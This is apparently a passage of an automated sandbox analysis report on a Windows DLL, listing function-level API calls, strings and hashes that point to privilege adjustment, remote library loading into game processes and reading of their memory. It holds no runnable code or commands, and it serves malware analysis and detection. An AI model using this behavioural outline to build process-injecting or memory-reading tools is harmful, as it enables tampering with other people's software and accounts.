                                                                                                                                      • API ID: _memset$CloseHandle$DebugOutputProcessString$CreateSleep__wfopen_s_strncpy$CurrentExecuteLookupOpenPrivilegeShellTokenValue_malloc_strrchr
                                                                                                                                      • String ID: <$@$C:\pl.txt$pi$updebug(GetCurrentProcess())==FALSE$x*i
                                                                                                                                      • API String ID: 1005001699-430671369
                                                                                                                                      • Opcode ID: de5c195024e77e30d6028bb68439c2967e2addce0345d48d4590c2ec074513d6
                                                                                                                                      • Instruction ID: 27676660add463d44423310d8b201881b93669fbb383f0f1e29cf5b641bcf64f
                                                                                                                                      • Opcode Fuzzy Hash: de5c195024e77e30d6028bb68439c2967e2addce0345d48d4590c2ec074513d6
                                                                                                                                      • Instruction Fuzzy Hash: CAA1C1B19043409FC700DFA49945AAFB7E8FFCA318F54892EF99997241E7349508CB92
                                                                                                                                      Function 69EA1CA0 Relevance: 52.9, APIs: 10, Strings: 20, Instructions: 413COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA1D1C
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004D02EC,?,00000011,00000000), ref: 69EA1DA2
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004CE894,?,00000011,00000000), ref: 69EA1E23
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004D0064,?,00000011,00000000), ref: 69EA1EA4
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004CE730,?,00000011,00000000), ref: 69EA1F2C
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004C95FE,?,00000015,00000000), ref: 69EA1FB9
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0050197C,?,00000011,00000000), ref: 69EA205C
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004CE744,?,0000000E,00000000), ref: 69EA20F4
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0072988C,?,00000012,00000000), ref: 69EA2188
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA2221
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$Process$Read$Virtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege
                                                                                                                                      • String ID: .$.$1$8$8$a$a$a$c$c$d$h$i$m$m$m$n$o$o$r
                                                                                                                                      • API String ID: 1302054802-2385272561
                                                                                                                                      • Opcode ID: 529f9c2989cf143825e98e18cff654f960f7883852ce3a3b7d71eb2090eb6958
                                                                                                                                      • Instruction ID: d37383960cc521c0c3015c5b9b7db6f5b4706e06ff8a84549decb910c8c4d317
                                                                                                                                      • Opcode Fuzzy Hash: 529f9c2989cf143825e98e18cff654f960f7883852ce3a3b7d71eb2090eb6958
                                                                                                                                      • Instruction Fuzzy Hash: C2024A2150C3C18DE302CA28845475FBFD66BA670CF584A9DE1C56B392C2AAD64DC7BB
                                                                                                                                      Function 69E84C70 Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 183fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E84CD1
                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,76233310,76230F00,00000000), ref: 69E84CE3
                                                                                                                                      • _memset.LIBCMT ref: 69E84D08
                                                                                                                                      • GetLastError.KERNEL32 ref: 69E84D10
                                                                                                                                      • _sprintf.LIBCMT ref: 69E84D24
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E84D38
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E84D4E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84D55
                                                                                                                                      • _memset.LIBCMT ref: 69E84D79
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 69E84D81
                                                                                                                                      • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 69E84DBB
                                                                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,?), ref: 69E84DD1
                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 69E84DEB
                                                                                                                                      • _memset.LIBCMT ref: 69E84DF6
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E84E19
                                                                                                                                      • OutputDebugStringA.KERNEL32(==============begin==============), ref: 69E84E2C
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84E33
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E84E51
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E84E67
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84E6E
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E84E8C
                                                                                                                                      • OutputDebugStringA.KERNEL32(==============end==============), ref: 69E84E9F
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E84EA6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s_memset$File$CurrentMapping$CreateDirectoryErrorLastOpenProcessView_sprintf
                                                                                                                                      • String ID: ==============begin==============$==============end==============$C:\789.txt$GetCurDir failed (%d)
                                                                                                                                      • API String ID: 2828095576-3745111052
                                                                                                                                      • Opcode ID: e9e1e3f06adeb6ad79ace3b89f55b8f9189a41d7e224dc7ce0768b23ec0ab1bf
                                                                                                                                      • Instruction ID: bbfb8dbc65b0b63c758c361d02435b1c3698a4f3209e27d23ba3f189a8515e52
                                                                                                                                      • Opcode Fuzzy Hash: e9e1e3f06adeb6ad79ace3b89f55b8f9189a41d7e224dc7ce0768b23ec0ab1bf
                                                                                                                                      • Instruction Fuzzy Hash: 8951C3B5908345AFD310EBA49D85EBFB7E8EF89248F505D2DF58882141EB34DA088763
                                                                                                                                      Function 69E9E110 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 230libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 69E9E183
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 69E9E190
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,VerQueryValueA), ref: 69E9E19D
                                                                                                                                      • _malloc.LIBCMT ref: 69E9E1D5
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 69E9E3C5
                                                                                                                                      Strings
                                                                                                                                      • GetFileVersionInfoA, xrefs: 69E9E185
                                                                                                                                      • cbDescSize is : %d, xrefs: 69E9E2A9
                                                                                                                                      • \StringFileInfo\%04x%04x\LegalCopyright, xrefs: 69E9E363
                                                                                                                                      • VerQueryValueA, xrefs: 69E9E192
                                                                                                                                      • \StringFileInfo\%04x%04x\FileDescription, xrefs: 69E9E267
                                                                                                                                      • GetFileVersionInfoSizeA, xrefs: 69E9E17D
                                                                                                                                      • \VarFileInfo\Translation, xrefs: 69E9E209
                                                                                                                                      • \StringFileInfo\%04x%04x\CompanyName, xrefs: 69E9E2FA
                                                                                                                                      • version.dll, xrefs: 69E9E137
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$Library$FreeLoad_malloc
                                                                                                                                      • String ID: GetFileVersionInfoA$GetFileVersionInfoSizeA$VerQueryValueA$\StringFileInfo\%04x%04x\CompanyName$\StringFileInfo\%04x%04x\FileDescription$\StringFileInfo\%04x%04x\LegalCopyright$\VarFileInfo\Translation$cbDescSize is : %d$version.dll
                                                                                                                                      • API String ID: 802766039-4254682184
                                                                                                                                      • Opcode ID: 9355cc956d8346861657b3343e56cdebcf18ee8b117667ed74e528ca2ac9967e
                                                                                                                                      • Instruction ID: 7208845ee7fbfb8d62be2f4f73fc2ff1bd7f980f0b54385b93e7a96088c74713
                                                                                                                                      • Opcode Fuzzy Hash: 9355cc956d8346861657b3343e56cdebcf18ee8b117667ed74e528ca2ac9967e
                                                                                                                                      • Instruction Fuzzy Hash: 6E718BB2508340AFD301DF64DD84DAFB7E8BBC9744F50492EF69597241EB34DA488BA2
                                                                                                                                      Function 69E82D20 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 196COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82D36
                                                                                                                                      • OutputDebugStringA.KERNEL32(game type xk........................), ref: 69E82D50
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82D57
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82D96
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82DCE
                                                                                                                                        • Part of subcall function 69EBF2C5: __fsopen.LIBCMT ref: 69EBF2FB
                                                                                                                                        • Part of subcall function 69EA4960: OutputDebugStringA.KERNEL32(IsPorcWithTargetClass : login window,7699A040,69EA3812,00000000), ref: 69EA4968
                                                                                                                                        • Part of subcall function 69EA4960: OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA496F
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82E05
                                                                                                                                      Strings
                                                                                                                                      • game type ws........................, xrefs: 69E82DAA
                                                                                                                                      • game type leg......................, xrefs: 69E82EC2
                                                                                                                                      • game type xk........................, xrefs: 69E82D4B
                                                                                                                                      • game type gee......................., xrefs: 69E82E54
                                                                                                                                      • game type gom......................., xrefs: 69E82DE6
                                                                                                                                      • game type dee......................., xrefs: 69E82E1D
                                                                                                                                      • other game type....................., xrefs: 69E82F24
                                                                                                                                      • game type blue......................, xrefs: 69E82EF9
                                                                                                                                      • game type ty........................, xrefs: 69E82F5C
                                                                                                                                      • game type hero......................, xrefs: 69E82E8B
                                                                                                                                      • C:\pl.txt, xrefs: 69E82D30, 69E82D87, 69E82F41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString__wfopen_s$__fsopen
                                                                                                                                      • String ID: C:\pl.txt$game type blue......................$game type dee.......................$game type gee.......................$game type gom.......................$game type hero......................$game type leg......................$game type ty........................$game type ws........................$game type xk........................$other game type.....................
                                                                                                                                      • API String ID: 2578685260-2888131310
                                                                                                                                      • Opcode ID: ad301b04c6f3d7456fd23cab281c91f5f9e9652893931b57fccc6250a80c4c28
                                                                                                                                      • Instruction ID: a65cbf830bfefb15c82e87240094ee5f858fddfcc3455e92eba769b23e99b7e7
                                                                                                                                      • Opcode Fuzzy Hash: ad301b04c6f3d7456fd23cab281c91f5f9e9652893931b57fccc6250a80c4c28
                                                                                                                                      • Instruction Fuzzy Hash: 8B5104BA9042106BC600D2C4AA057AEF394AB98299F70CC7EF54ADB391E734D919D7C3
                                                                                                                                      Function 69EA6340 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 150sleepwindowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA6365
                                                                                                                                      • OutputDebugStringA.KERNEL32(in RemoteGameDllWQ), ref: 69EA637F
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA6386
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA63B8
                                                                                                                                      • OutputDebugStringA.KERNEL32(not newEngine1 or new Engine2), ref: 69EA63CC
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA63D3
                                                                                                                                      • _memset.LIBCMT ref: 69EA63F3
                                                                                                                                      • _strncpy.LIBCMT ref: 69EA6432
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA6449
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69EA645D
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA6464
                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 69EA6478
                                                                                                                                      • MessageBoxA.USER32(00000000,69EDE258,69EDE24C,00001000), ref: 69EA6498
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA64C5
                                                                                                                                      • OutputDebugStringA.KERNEL32(RemoteLibrary failed), ref: 69EA64D9
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA64E0
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69EA64FE
                                                                                                                                      • OutputDebugStringA.KERNEL32(sleep if leg or blue), ref: 69EA6512
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69EA6519
                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 69EA6535
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s$AttributesFileMessageSleep_memset_strncpy
                                                                                                                                      • String ID: C:\pl.txt$RemoteLibrary failed$in RemoteGameDllWQ$not newuser1 or new user2$sleep if leg or blue
                                                                                                                                      • API String ID: 534663367-1936516422
                                                                                                                                      • Opcode ID: ed47f071fed630bb6089c903ac0f91be482fa27e39239f4c74d9a316c4f404f2
                                                                                                                                      • Instruction ID: eac93c903c53e9eab42c46f939e57b3125e991fb54cabe6eb600054f32f86337
                                                                                                                                      • Opcode Fuzzy Hash: ed47f071fed630bb6089c903ac0f91be482fa27e39239f4c74d9a316c4f404f2
                                                                                                                                      • Instruction Fuzzy Hash: 1841B179504344ABD710EB689D45F6EB3A4AFCA708FB48C1CF8648A261E779E10DCB52
                                                                                                                                      Function 69EA39D0 Relevance: 35.1, APIs: 4, Strings: 16, Instructions: 118COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9D870: _memset.LIBCMT ref: 69E9D8F4
                                                                                                                                        • Part of subcall function 69E9D870: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 69E9D906
                                                                                                                                        • Part of subcall function 69E9D870: Module32First.KERNEL32 ref: 69E9D920
                                                                                                                                        • Part of subcall function 69E9D870: Module32Next.KERNEL32(00000000,?), ref: 69E9D979
                                                                                                                                        • Part of subcall function 69E9D870: CloseHandle.KERNEL32(00000000), ref: 69E9D983
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • _memset.LIBCMT ref: 69EA3A35
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,004A0000,?,00040000,?,?,?,?,?,?,?,69E840C7), ref: 69EA3A58
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00600000,?,00040000,?,?,?,?,?,?,?,69E840C7), ref: 69EA3ADF
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,69E840C7), ref: 69EA3B4F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
